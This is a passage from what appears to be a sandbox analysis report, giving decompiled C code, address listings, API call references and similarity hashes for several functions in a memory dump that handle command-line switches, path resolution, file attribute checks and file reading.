						_t111 =  &(_t205[0x1a]);
						_t175 = 9;
						 *((intOrPtr*)(_t226 - 0xc4)) = _t175;
						do {
							 *((intOrPtr*)(_t111 - 0x28)) = 0;
							 *_t111 = 0;
							_t111 =  &(_t111[1]);
							_t175 = _t175 - 1;
						} while (_t175 != 0);
						_t216 =  *(_t226 - 0xb8);
						if( *_t216 == 0) {
							_t205[0xe] = 0;
							_t205[0xd] = 0;
							L35:
							_t205[4] =  *0x373cd8;
							__imp__??_V@YAXPAX@Z(_t224);
							goto L36;
						}
						_t206 = E0033DF40(_t216 + wcsspn(_t216, L" \t") * 2);
						( *0x373cc4)[0xd] = _t206;
						if(_t206 == 0) {
							goto L50;
						}
						_t180 = _t206;
						_t56 =  &(_t180[0]); // 0x2
						_t216 = _t56;
						do {
							_t117 =  *_t180;
							_t180 =  &(_t180[0]);
						} while (_t117 != 0);
						_t118 = _t206 + (_t180 - _t216 >> 1) * 2;
						while(_t118 != _t206) {
							_t191 =  *(_t118 - 2) & 0x0000ffff;
							if(_t191 == 0x20 || _t191 ==  *((intOrPtr*)(_t226 - 0xc4))) {
								_t118 = _t118 + 0xfffffffe;
								continue;
							} else {
								break;
							}
						}
						 *_t118 = 0;
						if( *0x373cc9 == 0) {
							_t217 = ( *0x373cc4)[0xd];
							while(1) {
								_t207 = 0x2f;
								_t216 = E0033D7D4(_t217, _t207);
								 *(_t226 - 0xb8) = _t216;
								__eflags = _t216;
								if(_t216 == 0) {
									goto L28;
								}
								_t217 =  &(_t216[0]);
								_t128 = towupper( *_t217 & 0x0000ffff);
								__eflags = _t128 - 0x51;
								if(_t128 != 0x51) {
									continue;
								}
								 *0x35d0c8 = 0;
								_t190 =  *(_t226 - 0xb8);
								_t209 =  *(_t226 - 0xb8);
								 *(_t226 - 0xb8) =  &(_t209[0]);
								do {
									_t130 =  *_t209;
									_t209 =  &(_t209[0]);
									__eflags = _t130;
								} while (_t130 != 0);
								_t90 =  &(_t217[0]); // 0x0
								E00341040(_t190, (_t209 -  *(_t226 - 0xb8) >> 1) + 1, _t90);
								goto L28;
							}
						}
						L28:
						_t121 = E0033EA40(( *0x373cc4)[0xd], 0, 0);
						 *(_t226 - 0xc0) = _t121;
						_t205 =  *0x373cc4;
						if( *_t121 == 0) {
							L34:
							_t205[0xe] = _t121;
							goto L35;
						}
						_t216 =  &(_t205[0x1a]);
						 *(_t226 - 0xbc) = _t216;
						_t188 = 1;
						while(_t188 < 0xa) {
							 *(_t216 - 0x28) = _t121;
							_t218 = _t121;
							_t66 = _t218 + 2; // 0x2
							 *(_t226 - 0xb8) = _t66;
							do {
								_t123 =  *_t218;
								_t218 = _t218 + 2;
							} while (_t123 != 0);
							_t220 = _t218 -  *(_t226 - 0xb8) >> 1;
							 *( *(_t226 - 0xbc)) = _t220;
							_t121 =  *(_t226 - 0xc0) + _t220 * 2 + 2;
							 *(_t226 - 0xc0) = _t121;
							_t188 = _t188 + 1;
							_t216 =  &(( *(_t226 - 0xbc))[1]);
							 *(_t226 - 0xbc) = _t216;
							if( *_t121 != 0) {
								continue;
							}
							goto L34;
						}
						goto L34;
					}
				}
			}

0x00341f52
0x00341f57
0x00341f5c
0x00341f61
0x00341f63
0x00341f65
0x00341f6b
0x00341f71
0x00341f74
0x00341f7a
0x00341f80
0x00341f8a
0x00341fa3
0x00341fab
0x00341fb1
0x00341fb7
0x00341fba
0x00341fc0
0x00341fc9
0x00341fcf
0x00341fd7
0x0034d476
0x00341fdd
0x00341fe0
0x00341fe4
0x00341fee
0x00341fee
0x00341fe4
0x00341ffb
0x0034d4a4
0x00000000
0x00342001
0x00342001
0x00342026
0x0034202e
0x00342031
0x0034d47c
0x0034d482
0x0034d484
0x0034d485
0x0034d48a
0x0034d493
0x0034d493
0x0034d493
0x0034d494
0x00342281
0x00342286
0x00342286
0x00342037
0x00342037
0x0034203e
0x00342044
0x0034204a
0x00342050
0x00342053
0x00342055
0x00342058
0x00342062
0x00342294
0x0034229e
0x003422a0
0x00000000
0x00000000
0x00000000
0x00342068
0x00342068
0x00342071
0x00342074
0x00342291
0x00000000
0x00342291
0x0034207a
0x00342087
0x00342095
0x00342098
0x00342098
0x003420a5
0x003420aa
0x003420b2
0x0034d4fa
0x0034d4fb
0x0034d4fb
0x0034d502
0x00000000
0x0034d504
0x003420c5
0x003420ca
0x003420cc
0x003420cf
0x003420cf
0x003420d2
0x003420d5
0x003420df
0x003420e2
0x003420ea
0x003420ed
0x003420f7
0x00342102
0x00342106
0x00342106
0x00342114
0x00342119
0x0034211b
0x0034211e
0x0034211e
0x00342121
0x00342124
0x00342132
0x00342137
0x0034213c
0x00342142
0x00342147
0x0034d50c
0x0034d50c
0x00000000
0x0034d50c
0x0034214d
0x00342153
0x00342158
0x00342159
0x0034215f
0x0034215f
0x00342162
0x00342164
0x00342167
0x00342167
0x0034216c
0x00342175
0x003422ab
0x003422ae
0x0034226f
0x00342274
0x00342278
0x00000000
0x0034227f
0x00342191
0x00342198
0x0034219d
0x00000000
0x00000000
0x003421a3
0x003421a5
0x003421a5
0x003421a8
0x003421a8
0x003421ab
0x003421ae
0x003421b7
0x003421ba
0x003421be
0x003421c5
0x00342289
0x00000000
0x00000000
0x00000000
0x00000000
0x003421c5
0x003421da
0x003421e3
0x0034d514
0x0034d517
0x0034d519
0x0034d521
0x0034d523
0x0034d529
0x0034d52b
0x00000000
0x00000000
0x0034d531
0x0034d538
0x0034d53f
0x0034d543
0x00000000
0x00000000
0x0034d545
0x0034d54b
0x0034d551
0x0034d556
0x0034d55c
0x0034d55c
0x0034d55f
0x0034d562
0x0034d562
0x0034d56f
0x0034d574
0x00000000
0x0034d574
0x0034d517
0x003421e9
0x003421f5
0x003421fa
0x00342200
0x00342209
0x0034226c
0x0034226c
0x00000000
0x0034226c
0x0034220b
0x0034220e
0x00342216
0x00342217
0x0034221c
0x0034221f
0x00342221
0x00342224
0x0034222a
0x0034222a
0x0034222d
0x00342230
0x0034223b
0x00342243
0x0034224e
0x00342251
0x00342257
0x0034225e
0x00342261
0x0034226a
0x00000000
0x00000000
0x00000000
0x0034226a
0x00000000
0x00342217
0x00342062

APIs

memset.MSVCRT ref: 00341FA3
wcsspn.MSVCRT ref: 00342181
??_V@YAXPAX@Z.MSVCRT ref: 00342278

Part of subcall function 00342D22: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00000000,?,00000000,00000000,?,?,?,00343C29,?,00000000,-00000001,00000000,?,00000000), ref: 00342D87
Part of subcall function 00342D22: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000001,?,00343C29,?,00000000,-00000001,00000000,?,00000000), ref: 00342D91
Part of subcall function 00342D22: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001,?,00000000,?,00343C29,?,00000000,-00000001,00000000,?,00000000), ref: 00342DA4
Part of subcall function 00342D22: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00343C29,?,00000000,-00000001,00000000,?,00000000), ref: 00342DAE

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: ErrorMode$FullNamePathmemsetwcsspn
String ID:
API String ID: 1535828850-0
Opcode ID: e12db26cd6c7b77211d1d345cb2aa33696d61620d10a5336069bd157101c99e0
Instruction ID: 2489e18a4164427d2d7babc20902253471feef665d6c7bd2983545da489d8f6b
Opcode Fuzzy Hash: e12db26cd6c7b77211d1d345cb2aa33696d61620d10a5336069bd157101c99e0
Instruction Fuzzy Hash: 1AC15075A00215CFDB66DF28C890BA9B7F6FB44300F55819AE40AAF791DB70AE81CF40

Uniqueness

Uniqueness Score: -1.00%

Function 00343B5D, Relevance: 7.7, APIs: 5, Instructions: 155
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E00343B5D(signed short* __ecx, int __edx) {
				signed int _v8;
				int _v20;
				char _v24;
				void* _v28;
				void _v548;
				WCHAR* _v552;
				signed int _v556;
				signed short* _v560;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t31;
				int _t46;
				signed int _t52;
				signed short* _t58;
				signed int _t59;
				intOrPtr _t63;
				signed short* _t65;
				void* _t77;
				signed short* _t78;
				void* _t79;
				signed short* _t84;
				signed short** _t87;
				signed int _t88;

				_t82 = __edx;
				_t31 =  *0x35d0b4; // 0xd59bd0e8
				_v8 = _t31 ^ _t88;
				_v24 = 1;
				_t65 = 0;
				_v20 = 0x104;
				_v28 = 0;
				_t84 = __ecx;
				memset( &_v548, 0, 0x104);
				if(E00340C70( &_v548, ((0 | _v24 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
					L18:
					_t87 = 1;
				} else {
					0xffce = 0x24;
					_t87 = E003400B0(0xffce);
					if(_t87 == 0) {
						L22:
						E00359287(0xffce);
						__imp__longjmp(0x36b8b8, 1);
						goto L23;
					} else {
						 *_t87 = _t84;
						E0033C923(_t87);
						_t84 = _t87[3];
						_v560 = _t87[6];
						_v552 =  *_t87;
						_t63 = E003400B0(0xffce);
						if(_t63 == 0) {
							goto L22;
						} else {
							 *0x373cec = _t63;
							E003436CB(0, _t63, 0x7fe7, 0);
							_t72 = _v28;
							if(_v28 == 0) {
								L23:
								_t72 =  &_v548;
							}
						}
					}
					_t82 = _v20;
					if(E00342D22(_t72, _v20, _v552) != 0) {
						goto L18;
					} else {
						_t73 = _v28;
						if(_v28 == 0) {
							_t73 =  &_v548;
						}
						_t46 = 0x5c;
						_t82 = _t46;
						 *((short*)(E00342349(_t73, _t46) + 2)) = 0;
						_t48 = _v28;
						if(_v28 == 0) {
							_t48 =  &_v548;
						}
						E00340D89(_t82, _t48);
						if(_t84 == 0) {
							L20:
							E0033C923(_t87);
							_t87[6] = _v560;
						} else {
							_t52 =  *_t84 & 0x0000ffff;
							_t82 = 0x3a;
							if(_t52 == _t82) {
								goto L20;
							} else {
								_t77 = 0x5c;
								if(_t52 == _t77) {
									_t58 = _v552;
									if(_t84 == _t58) {
										L21:
										_t84 =  &(_t84[1]);
									} else {
										while( *_t58 != _t65) {
											_t78 = _t58;
											_t58 =  &(_t58[1]);
											if(_t58 != _t84) {
												continue;
											}
											L13:
											_t59 =  *_t78 & 0x0000ffff;
											if(_t59 == _t82) {
												goto L21;
											} else {
												_t79 = 0x5c;
												if(_t59 == _t79) {
													goto L21;
												}
											}
											goto L15;
										}
										_t78 = _t65;
										goto L13;
									}
								}
								L15:
								_v556 =  *_t84 & 0x0000ffff;
								 *_t84 = 0;
								if(GetFileAttributesW(_v552) == 0xffffffff) {
									_t65 = GetLastError();
								}
								 *0x373cf0 = _t65;
								 *_t84 = _v556;
								if( *0x373cf0 == 0) {
									goto L20;
								} else {
									goto L18;
								}
							}
						}
					}
				}
				__imp__??_V@YAXPAX@Z();
				return E00346FD0(_t87, _t65, _v8 ^ _t88, _t82, _t84, _t87, _v28);
			}

0x00343b5d
0x00343b68
0x00343b6f
0x00343b7a
0x00343b7e
0x00343b80
0x00343b8a
0x00343b8f
0x00343b91
0x00343bb7
0x00343cf0
0x00343cf2
0x00343bbd
0x00343bbf
0x00343bc5
0x00343bc9
0x0034e009
0x0034e009
0x0034e015
0x00000000
0x00343bcf
0x00343bd1
0x00343bd3
0x00343be0
0x00343be3
0x00343beb
0x00343bf1
0x00343bf8
0x00000000
0x00343bfe
0x00343c04
0x00343c0b
0x00343c10
0x00343c15
0x0034e01b
0x0034e01b
0x0034e01b
0x00343c15
0x00343bf8
0x00343c21
0x00343c2b
0x00000000
0x00343c31
0x00343c31
0x00343c36
0x0034e026
0x0034e026
0x00343c3e
0x00343c3f
0x00343c48
0x00343c4c
0x00343c51
0x0034e031
0x0034e031
0x00343c5d
0x00343c64
0x00343d10
0x00343d12
0x00343d1d
0x00343c6a
0x00343c6a
0x00343c6f
0x00343c73
0x00000000
0x00343c79
0x00343c7b
0x00343c7f
0x00343c81
0x00343c89
0x00343d22
0x00343d22
0x00343c8f
0x00343c8f
0x00343c98
0x00343c9a
0x00343c9f
0x00000000
0x00000000
0x00343ca1
0x00343ca1
0x00343ca7
0x00000000
0x00343ca9
0x00343cab
0x00343caf
0x00000000
0x00000000
0x00343caf
0x00000000
0x00343ca7
0x0034e03c
0x00000000
0x0034e03c
0x00343c89
0x00343cb1
0x00343cba
0x00343cc2
0x00343cce
0x00343cd6
0x00343cd6
0x00343cde
0x00343ce4
0x00343cee
0x00000000
0x00000000
0x00000000
0x00000000
0x00343cee
0x00343c73
0x00343c64
0x00343c2b
0x00343cf6
0x00343d0f

APIs

memset.MSVCRT ref: 00343B91

Part of subcall function 00340C70: ??_V@YAXPAX@Z.MSVCRT ref: 00340CBA
Part of subcall function 00340C70: memset.MSVCRT ref: 00340CDD

??_V@YAXPAX@Z.MSVCRT ref: 00343CF6

Part of subcall function 003400B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,0033DF68,00000001,?,00000000,00343458,-00000105,0035BDD8,00000240,00344B82,00000000,00000000,0034AE6E,00000000), ref: 003400C1
Part of subcall function 003400B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,0033DF68,00000001,?,00000000,00343458,-00000105,0035BDD8,00000240,00344B82,00000000,00000000,0034AE6E,00000000,?), ref: 003400C8

longjmp.MSVCRT(0036B8B8,00000001,-00000001,00000000,?,00000000), ref: 0034E015

Part of subcall function 0033C923: _wcsicmp.MSVCRT ref: 0033C9CF
Part of subcall function 0033C923: _wcsicmp.MSVCRT ref: 0033C9E5
Part of subcall function 0033C923: GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001,00000000,?,00000000), ref: 0033CA04
Part of subcall function 0033C923: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 0033CA15

Part of subcall function 003436CB: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,?,0033590A,00000000), ref: 003436F0

Part of subcall function 00342D22: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00000000,?,00000000,00000000,?,?,?,00343C29,?,00000000,-00000001,00000000,?,00000000), ref: 00342D87
Part of subcall function 00342D22: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000001,?,00343C29,?,00000000,-00000001,00000000,?,00000000), ref: 00342D91
Part of subcall function 00342D22: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001,?,00000000,?,00343C29,?,00000000,-00000001,00000000,?,00000000), ref: 00342DA4
Part of subcall function 00342D22: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00343C29,?,00000000,-00000001,00000000,?,00000000), ref: 00342DAE

GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00000000,-00000001,00000000,?,00000000), ref: 00343CC5
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00343CD0

Part of subcall function 00342349: wcsrchr.MSVCRT ref: 0034234F

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: Error$Mode$AttributesFileHeapLast_wcsicmpmemset$AllocCurrentDirectoryFullNamePathProcesslongjmpwcsrchr
String ID:
API String ID: 3402406610-0
Opcode ID: fb9113c0817b6420c39e1e41e5e64f8986c79c3f2791ee25191bc37eb8514cc0
Instruction ID: 16ec2f2c6cb61fbd8ded2d1c62d7e767f51189bbf29fd7270566336d20f475a9
Opcode Fuzzy Hash: fb9113c0817b6420c39e1e41e5e64f8986c79c3f2791ee25191bc37eb8514cc0
Instruction Fuzzy Hash: B351D931A002269BDB36DF65E885B7E77F4EF44310F150469E949EF290DB70AE80DB80

Uniqueness

Uniqueness Score: -1.00%

Function 0033B710, Relevance: 7.6, APIs: 5, Instructions: 132
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E0033B710(intOrPtr _a4) {
				signed int _v8;
				int _v20;
				char _v24;
				int _v28;
				void _v548;
				int _v556;
				char _v560;
				int _v564;
				void _v1084;
				int _v1088;
				intOrPtr _v1092;
				void* _v1096;
				char _v1100;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t41;
				intOrPtr _t43;
				int _t46;
				char _t67;
				signed int _t85;

				_t41 =  *0x35d0b4; // 0xd59bd0e8
				_v8 = _t41 ^ _t85;
				_t43 = _a4;
				_t84 = 0;
				_v1092 = _t43;
				_push(0);
				_push(0x36b8f8);
				L003482C1();
				_t67 = 1;
				if(_t43 != 0) {
					 *0x36b8b0 = 1;
					L12:
					return E00346FD0(_t67, _t67, _v8 ^ _t85, _t79, 0x104, _t84);
				}
				if( *0x373ccc == 0) {
					if( *0x378058 != 0) {
						goto L2;
					}
					_t46 = 1;
					if( *0x373cc4 == 0) {
						L3:
						_v1088 = _t46;
						_v564 = _t84;
						_v560 = _t67;
						_v556 = 0x104;
						memset( &_v1084, _t84, 0x104);
						_v28 = _t84;
						_v24 = _t67;
						_v20 = 0x104;
						memset( &_v548, _t84, 0x104);
						_t84 = 0x7ee3;
						if(E00340C70( &_v1084, ((0 | _v560 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) >= 0 && E00340C70( &_v548, ((0 | _v24 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) >= 0) {
							_t63 = _v28;
							if(_v28 == 0) {
								_t63 =  &_v548;
							}
							_t76 = _v564;
							if(_v564 == 0) {
								_t76 =  &_v1084;
							}
							_t79 =  &_v1088;
							_t67 = E00345FC8(_v1092,  &_v1088, _t76, _v556, _t63, _v20,  &_v1100,  &_v1096);
							if(_t67 == 0) {
								if(_v28 == 0) {
									_t79 =  &_v548;
								}
								_t78 = _v564;
								if(_v564 == 0) {
									_t78 =  &_v1084;
								}
								_t67 = E0033B97C(_t78, _t79, _v1088, _v1100, _v1096);
							}
						}
						 *0x36b8b0 = _t67;
						__imp__??_V@YAXPAX@Z(_v28);
						__imp__??_V@YAXPAX@Z(_v564);
						goto L12;
					}
				}
				L2:
				_t46 = _t84;
				goto L3;
			}

0x0033b71b
0x0033b722
0x0033b725
0x0033b72b
0x0033b72d
0x0033b733
0x0033b734
0x0033b739
0x0033b741
0x0033b745
0x00349d59
0x0033b877
0x0033b889
0x0033b889
0x0033b751
0x00349d6a
0x00000000
0x00000000
0x00349d70
0x00349d78
0x0033b759
0x0033b75e
0x0033b76b
0x0033b773
0x0033b779
0x0033b77f
0x0033b787
0x0033b790
0x0033b793
0x0033b799
0x0033b7a9
0x0033b7c4
0x0033b7e7
0x0033b7ec
0x00349d83
0x00349d83
0x0033b7f2
0x0033b7fa
0x00349d8e
0x00349d8e
0x0033b811
0x0033b82a
0x0033b82e
0x0033b835
0x0033b88c
0x0033b88c
0x0033b837
0x0033b83f
0x0033b894
0x0033b894
0x0033b858
0x0033b858
0x0033b82e
0x0033b85d
0x0033b863
0x0033b870
0x00000000
0x0033b876
0x00349d7e
0x0033b757
0x0033b757
0x00000000

APIs

_setjmp3.MSVCRT ref: 0033B739
memset.MSVCRT ref: 0033B77F
memset.MSVCRT ref: 0033B799
??_V@YAXPAX@Z.MSVCRT ref: 0033B863
??_V@YAXPAX@Z.MSVCRT ref: 0033B870

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: memset$_setjmp3
String ID:
API String ID: 4215035025-0
Opcode ID: e704cda5fa95549f7ffd11797fc40cb92af6a272edaad1836cf63c0754e6ce5c
Instruction ID: 1a93b0832bad5bffd03b2eaba8e34148c24abb3adff8286d3d11011a524d165d
Opcode Fuzzy Hash: e704cda5fa95549f7ffd11797fc40cb92af6a272edaad1836cf63c0754e6ce5c
Instruction Fuzzy Hash: BF417471E012699BDB26DB65DCC5AEEBBB8EF44304F0441EAE609AB111DB309E84CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00358F66, Relevance: 7.6, APIs: 5, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E00358F66(void* __ecx, int __edx) {
				signed int _v8;
				int _v20;
				char _v24;
				int _v28;
				void _v548;
				int _v556;
				char _v560;
				void* _v564;
				void _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t31;
				signed int _t55;
				int _t56;
				void* _t66;
				void* _t70;
				int _t71;
				signed int _t74;

				_t69 = __edx;
				_t31 =  *0x35d0b4; // 0xd59bd0e8
				_v8 = _t31 ^ _t74;
				_v560 = 1;
				_t71 = 0;
				_v556 = 0x104;
				_v564 = 0;
				_t56 = __edx;
				_t70 = __ecx;
				memset( &_v1084, 0, 0x104);
				_v28 = 0;
				_v24 = 1;
				_v20 = 0x104;
				memset( &_v548, 0, 0x104);
				if(E00340C70( &_v1084, ((0 | _v560 == 0x00000000) - 0x00000001 & 0x0000fdc6) + 0x208) < 0 || E00340C70( &_v548, ((0 | _v24 == 0x00000000) - 0x00000001 & 0x0000fdc6) + 0x208) < 0) {
					L13:
					__imp__??_V@YAXPAX@Z(_v28);
					__imp__??_V@YAXPAX@Z();
					return E00346FD0(_t71, _t56, _v8 ^ _t74, _t69, _t70, _t71, _v564);
				} else {
					_t64 = _v564;
					if(_v564 == 0) {
						_t64 =  &_v1084;
					}
					_t69 = _v556;
					if(E00342D22(_t64, _v556, _t70) == 0) {
						_t65 = _v28;
						if(_v28 == 0) {
							_t65 =  &_v548;
						}
						_t69 = _v20;
						if(E00342D22(_t65, _v20, _t56) == 0) {
							_t55 = _v28;
							if(_t55 == 0) {
								_t55 =  &_v548;
							}
							_t66 = _v564;
							if(_t66 == 0) {
								_t66 =  &_v1084;
							}
							__imp___wcsicmp(_t66, _t55);
							asm("sbb esi, esi");
							_t71 =  ~_t55 + 1;
						}
					}
					goto L13;
				}
			}

0x00358f66
0x00358f71
0x00358f78
0x00358f83
0x00358f8b
0x00358f8d
0x00358f99
0x00358fa1
0x00358fa3
0x00358fa5
0x00358fad
0x00358fb5
0x00358fb9
0x00358fc5
0x00358ff1
0x00359082
0x00359085
0x00359092
0x003590ab
0x0035901a
0x0035901a
0x00359022
0x00359024
0x00359024
0x0035902a
0x00359038
0x0035903a
0x0035903f
0x00359041
0x00359041
0x00359047
0x00359052
0x00359054
0x00359059
0x0035905b
0x0035905b
0x00359061
0x00359069
0x0035906b
0x0035906b
0x00359073
0x0035907e
0x00359081
0x00359081
0x00359052
0x00000000
0x00359038

APIs

memset.MSVCRT ref: 00358FA5
memset.MSVCRT ref: 00358FC5

Part of subcall function 00340C70: ??_V@YAXPAX@Z.MSVCRT ref: 00340CBA
Part of subcall function 00340C70: memset.MSVCRT ref: 00340CDD

_wcsicmp.MSVCRT ref: 00359073
??_V@YAXPAX@Z.MSVCRT ref: 00359085
??_V@YAXPAX@Z.MSVCRT ref: 00359092

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: memset$_wcsicmp
String ID:
API String ID: 1670951261-0
Opcode ID: 001bd74d88e3f3184bafa3d45f2cc5b6f6161f04f49745e33084386ce83951a7
Instruction ID: 39f4bcd7baecf910f4f9ded8c2a6193e3daa346a94c8723550918ab01c08f7ea
Opcode Fuzzy Hash: 001bd74d88e3f3184bafa3d45f2cc5b6f6161f04f49745e33084386ce83951a7
Instruction Fuzzy Hash: 9E31C771A002199BDF25CBA4DC85BEFBBB8EF04355F0005AAE905D7191EB349E84CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00358E52, Relevance: 7.6, APIs: 5, Instructions: 103
fileCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E00358E52(intOrPtr __edx, long _a4, DWORD* _a8) {
				void _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				void* __ecx;
				void _t29;
				long _t38;
				void* _t39;
				signed int _t45;
				long _t46;
				void* _t52;
				void* _t54;
				intOrPtr _t57;
				void _t60;
				long _t61;

				_v16 = _v16 & 0x00000000;
				_v20 = _v20 & 0x00000000;
				_push(_t39);
				_push(_t39);
				_v12 = __edx;
				_t54 = 2;
				_t61 = E00335DB5(_t39, _t54);
				if(_t61 == 0xffffffff) {
					_t52 = 0x6e;
					E0035985A(_t52);
					L2:
					E003585E9(0, 1);
				}
				_t38 = _a4;
				while(1) {
					_t23 =  &_v8;
					__imp___get_osfhandle(0);
					if(ReadFile( &_v8, _t61, _t38, _a8, _t23) == 0) {
						break;
					}
					_t57 = _v12;
					_t29 = _v8;
					_t60 = _t29;
					_t45 =  *(_t57 + 0x1c);
					if((_t45 & 0x0000c000) == 0) {
						if(_t60 <= 2) {
							L9:
							_t45 = _t45 | 0x00008000;
						} else {
							_t57 = _v12;
							if( *_t38 != 0xfeff) {
								goto L9;
							} else {
								_t45 = _t45 | 0x00004000;
							}
						}
						 *(_t57 + 0x1c) = _t45;
					}
					if(_t60 == 0) {
						_t46 = _v16;
					} else {
						asm("sbb ecx, ecx");
						_t46 = E00356CEF( ~((_t45 & 0x00008002) - 0x8002) + 1, _t38,  &_v8,  &_v20);
						_t29 = _v8;
						_v16 = _t46;
					}
					if(_t29 == _a8) {
						continue;
					}
					if(_t46 == 0) {
						_t31 = _t29 - _t60;
						__imp___get_osfhandle(1);
						SetFilePointer(_t29 - _t60, _t61, _t31, _t46);
					}
					return _t61;
				}
				 *0x373cf0 = GetLastError();
				E0033DB92(_t61);
				_push(0);
				_push( *0x373cf0);
				E0033C5A2(_t61);
				goto L2;
			}

0x00358e5a
0x00358e5e
0x00358e65
0x00358e66
0x00358e69
0x00358e6c
0x00358e72
0x00358e77
0x00358e7b
0x00358e7c
0x00358e81
0x00358e86
0x00358e86
0x00358e8b
0x00358e8e
0x00358e90
0x00358e99
0x00358ea9
0x00000000
0x00000000
0x00358eaf
0x00358eb2
0x00358eb5
0x00358eb7
0x00358ec0
0x00358ec5
0x00358edc
0x00358edc
0x00358ec7
0x00358ecf
0x00358ed2
0x00000000
0x00358ed4
0x00358ed4
0x00358ed4
0x00358ed2
0x00358ee2
0x00358ee2
0x00358ee7
0x00358f10
0x00358ee9
0x00358efe
0x00358f06
0x00358f08
0x00358f0b
0x00358f0b
0x00358f16
0x00000000
0x00000000
0x00358f1e
0x00358f23
0x00358f27
0x00358f2f
0x00358f2f
0x00358f3d
0x00358f3d
0x00358f48
0x00358f4d
0x00358f52
0x00358f54
0x00358f5a
0x00000000

APIs

_get_osfhandle.MSVCRT ref: 00358E99
ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00358EA1
_get_osfhandle.MSVCRT ref: 00358F27
SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,?,?,00000000,00000000), ref: 00358F2F

Part of subcall function 003585E9: longjmp.MSVCRT(0036B8F8,00000001,00000000,00358DAB,?,?,?,?,00000000,?,00000021,00000000,?,?,?,00000000), ref: 0035865D
Part of subcall function 003585E9: memset.MSVCRT ref: 003586B6
Part of subcall function 003585E9: memset.MSVCRT ref: 003586E4
Part of subcall function 003585E9: memset.MSVCRT ref: 00358712

GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00358F40

Part of subcall function 0033DB92: _close.MSVCRT ref: 0033DBC1

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: memset$File_get_osfhandle$ErrorLastPointerRead_closelongjmp
String ID:
API String ID: 288106245-0
Opcode ID: 46636e9aeb1fa7cb75e59b42e995a0ba57d0510f84f4b0477321439bc600d5dd
Instruction ID: 8382abd537a4979124938f021438a74a8dce007592c77b30a59a5d332ff1f19e
Opcode Fuzzy Hash: 46636e9aeb1fa7cb75e59b42e995a0ba57d0510f84f4b0477321439bc600d5dd
Instruction Fuzzy Hash: 77310471A10105ABEB2ADF64D846FAE77BDEB84312F10812AF905E62D0DF309D448B50

Uniqueness

Uniqueness Score: -1.00%

Function 00335712, Relevance: 7.6, APIs: 5, Instructions: 98fileCOMMON

Download Yara Rule

APIs

_get_osfhandle.MSVCRT ref: 00335734
ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,0035896D,00000021,?,?,00000000,?,?,?,?,?,00000000,?,00000021,00000000,?), ref: 0033573C
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,?,00000000,00000000), ref: 003496FE
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,?,00000000,00000000), ref: 0034974A
DeleteFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,?,?,?,00000000,00000000), ref: 00349775

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

